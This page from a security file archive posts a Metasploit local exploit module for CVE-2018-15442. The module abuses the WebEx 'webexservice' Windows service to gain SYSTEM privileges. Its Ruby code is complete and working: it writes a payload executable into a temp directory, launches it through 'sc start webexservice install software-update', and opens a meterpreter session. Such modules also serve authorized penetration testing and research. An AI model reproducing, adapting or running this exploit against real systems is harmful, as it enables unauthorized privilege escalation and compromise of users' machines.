what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

WebEx Local Service Permissions Code Execution

WebEx Local Service Permissions Code Execution
Posted Oct 24, 2018
Authored by Jeff McJunkin | Site metasploit.com

This Metasploit module exploits a flaw in the 'webexservice' Windows service, which runs as SYSTEM, can be used to run arbitrary commands locally, and can be started by limited users in default installations.

tags | exploit, arbitrary
systems | windows
advisories | CVE-2018-15442
SHA-256 | 5fd5f73708b7741614718b8a1cece16b9de49b88d3267e6f1549bbe34dc56a0a

WebEx Local Service Permissions Code Execution

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
Rank = GoodRanking

include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
include Msf::Post::File
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Services
include Msf::Post::Windows::Accounts

def initialize(info={})
super( update_info( info,
'Name' => 'WebEx Local Service Permissions Exploit',
'Description' => %q{
This module exploits a flaw in the 'webexservice' Windows service, which runs as SYSTEM,
can be used to run arbitrary commands locally, and can be started by limited users in
default installations.
},
'References' =>
[
['URL', 'https://webexec.org'],
['CVE', '2018-15442']
],
'DisclosureDate' => "Oct 09 2018",
'License' => MSF_LICENSE,
'Author' =>
[
'Jeff McJunkin <jeff.mcjunkin[at]gmail.com>'
],
'Platform' => [ 'win'],
'Targets' =>
[
[ 'Automatic', {} ],
[ 'Windows x86', { 'Arch' => ARCH_X86 } ],
[ 'Windows x64', { 'Arch' => ARCH_X64 } ]
],
'SessionTypes' => [ "meterpreter" ],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
'WfsDelay' => 5,
'ReverseConnectRetries' => 255
},
'DefaultTarget' => 0
))

register_options([
OptString.new("DIR", [ false, "Specify a directory to plant the EXE.", "%SystemRoot%\\Temp"])
])
@service_name = 'webexservice'
end

def validate_arch
return target unless target.name == 'Automatic'

case sysinfo['Architecture']
when 'x86'
fail_with(Failure::BadConfig, 'Invalid payload architecture') if payload_instance.arch.first == 'x64'
vprint_status('Detected x86 system')
return targets[1]
when 'x64'
vprint_status('Detected x64 system')
return targets[2]
end
end

def check_service_exists?(service)
srv_info = service_info(service)

if srv_info.nil?
vprint_warning("Unable to enumerate services.")
return false
end

if srv_info && srv_info[:display].empty?
vprint_warning("Service #{service} does not exist.")
return false
else
return true
end
end

def check
unless check_service_exists?(@service_name)
return Exploit::CheckCode::Safe
end

srv_info = service_info(@service_name)

vprint_status(srv_info.to_s)

case START_TYPE[srv_info[:starttype]]
when 'Disabled'
vprint_error("Service startup is Disabled, so will be unable to exploit unless account has correct permissions...")
return Exploit::CheckCode::Safe
when 'Manual'
vprint_error("Service startup is Manual, so will be unable to exploit unless account has correct permissions...")
return Exploit::CheckCode::Safe
when 'Auto'
vprint_good("Service is set to Automatically start...")
end

if check_search_path
return Exploit::CheckCode::Safe
end

return Exploit::CheckCode::Appears
end

def check_write_access(path)
perm = check_dir_perms(path, @token)
if perm and perm.include?('W')
print_good("Write permissions in #{path} - #{perm}")
return true
elsif perm
vprint_status ("Permissions for #{path} - #{perm}")
else
vprint_status ("No permissions for #{path}")
end

return false
end


def exploit
begin
@token = get_imperstoken
rescue Rex::Post::Meterpreter::RequestError
vprint_error("Error while using get_imperstoken: #{e}")
end

fail_with(Failure::Unknown, "Unable to retrieve token.") unless @token

if is_system?
fail_with(Failure::Unknown, "Current user is already SYSTEM, aborting.")
end

print_status("Checking service exists...")
if !check_service_exists?(@service_name)
fail_with(Failure::NoTarget, "The service doesn't exist.")
end

if is_uac_enabled?
print_warning("UAC is enabled, may get false negatives on writable folders.")
end

# Use manually selected Dir
file_path = datastore['DIR']

@exe_file_name = Rex::Text.rand_text_alphanumeric(8)
@exe_file_path = "#{file_path}\\#{@exe_file_name}.exe"

service_information = service_info(@service_name)

# Check architecture
valid_arch = validate_arch
exe = generate_payload_exe(:arch => valid_arch.arch)

#
# Drop the malicious executable into the path
#
print_status("Writing #{exe.length.to_s} bytes to #{@exe_file_path}...")
begin
write_file(@exe_file_path, exe)
register_file_for_cleanup(@exe_file_path)
rescue Rex::Post::Meterpreter::RequestError => e
# Can't write the file, can't go on
fail_with(Failure::Unknown, e.message)
end

#
# Run the service
#
print_status("Launching service...")
res = cmd_exec("cmd.exe",
"/c sc start webexservice install software-update 1 #{@exe_file_path}")

if service_restart(@service_name)
print_status("Service started...")
else
service_information = service_info(@service_name)
if service_information[:starttype] == START_TYPE_AUTO
if job_id
print_status("Unable to start service, handler running waiting for a reboot...")
while(true)
break if session_created?
select(nil,nil,nil,1)
end
else
fail_with(Failure::Unknown, "Unable to start service, use exploit -j to run as a background job and wait for a reboot...")
end
else
fail_with(Failure::Unknown, "Unable to start service, and it does not auto start, cleaning up...")
end
end
end
end

Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close